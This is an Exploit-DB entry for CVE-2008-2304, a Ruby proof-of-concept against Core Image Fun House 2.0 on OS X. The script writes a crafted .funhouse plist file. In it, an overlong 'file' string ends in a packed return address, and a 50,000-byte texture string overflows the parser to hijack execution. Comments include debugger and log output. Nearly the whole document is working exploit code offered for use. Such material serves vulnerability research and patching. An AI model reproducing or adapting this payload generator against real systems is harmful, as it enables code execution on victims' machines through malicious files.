Core Image Fun House <= 2.0 - Arbitrary Code Execution PoC OSX

2008-07-11T00:00:00
ID EDB-ID:6043
Type exploitdb
Reporter Adriel T. Desautels
Modified 2008-07-11T00:00:00

Description

Core Image Fun House <= 2.0 Arbitrary Code Execution PoC (OSX). CVE-2008-2304. Dos exploit for osx platform

                                        
                                            #!/usr/bin/ruby
# Copyright (c) Netragard, LLC. adriel@netragard.com
#
# /Developer/Applications/Graphics Tools/Core Image Fun House.app
# /Contents/MacOS/Core Image Fun House
#
# (gdb) x/10s 0xbfffddf7
# 0xbfffddf7:      'Z' &lt;repeats 101 times&gt;, "DCBA center"
#
# 2007-07-10 21:15:34.573 Core Image Fun House[1061] CFLog (0):
#        CFPropertyListCreateFromXMLData(): plist parse failed;
#        the data is notproper UTF-8. The file name for this data
#        could be:
$
#        /Users/test/Desktop/SuperTastey.funhouse/file.xml
#        The parser will retry as in 10.2, but the problem should be
#         corrected in the plist.
#
#  \x80-\xFF range that do not form proper utf8

len = 300
fname = "SuperTastey"
retaddr = 0x0d0d0d0d  # There are lots of filtered chars!

if File.exist?(fname + ".funhouse/file.xml")
    File.unlink(fname + ".funhouse/file.xml")
    Dir.rmdir(fname + ".funhouse")
end
Dir.mkdir(fname + ".funhouse")

FUNSTUFF =
"&lt;?xml version=\"1.0\" encoding=\"UTF-8\"?&gt;" +
"&lt;!DOCTYPE plist PUBLIC \"-//Apple Computer//DTD PLIST 1.0//EN\"
\"http://www.apple.com/DTDs/PropertyList-1.0.dtd\"&gt;" +
"&lt;plist version=\"1.0\"&gt;" +
"&lt;dict&gt;" +
"&lt;key&gt;layers&lt;/key&gt;" +
"&lt;array&gt;" +
"&lt;dict&gt;" +
"&lt;key&gt;file&lt;/key&gt;" +
"&lt;string&gt;" +
"Z" * len + [retaddr].pack("V") +
"&lt;/string&gt;" +
"&lt;key&gt;offsetX&lt;/key&gt;" +
"&lt;real&gt;0.0&lt;/real&gt;" +
"&lt;key&gt;offsetY&lt;/key&gt;" +
"&lt;real&gt;0.0&lt;/real&gt;" +
"&lt;key&gt;type&lt;/key&gt;" +
"&lt;string&gt;image&lt;/string&gt;" +
"&lt;/dict&gt;" +
"&lt;dict&gt;" +
"&lt;key&gt;classname&lt;/key&gt;" +
"&lt;string&gt;CIGlassDistortion&lt;/string&gt;" +
"&lt;key&gt;type&lt;/key&gt;" +
"&lt;string&gt;filter&lt;/string&gt;" +
"&lt;key&gt;values&lt;/key&gt;" +
"&lt;dict&gt;" +
"&lt;key&gt;inputCenter_CIVectorValue&lt;/key&gt;" +
"&lt;string&gt;[150 150]&lt;/string&gt;" +
"&lt;key&gt;inputScale&lt;/key&gt;" +
"&lt;real&gt;200&lt;/real&gt;" +
"&lt;key&gt;inputTexture&lt;/key&gt;" +
"&lt;string&gt;" +
"Z" * 50000 +
"&lt;/string&gt;" +
"&lt;/dict&gt;" +
"&lt;/dict&gt;" +
"&lt;/array&gt;" +
"&lt;/dict&gt;" +
"&lt;/plist&gt;" + "\n"

target_file = File.open("SuperTastey.funhouse/file.xml", "w+") { |f|
~  f.print(FUNSTUFF)  # weeeeee... lets have fun.
~  f.close
} 

# milw0rm.com [2008-07-11]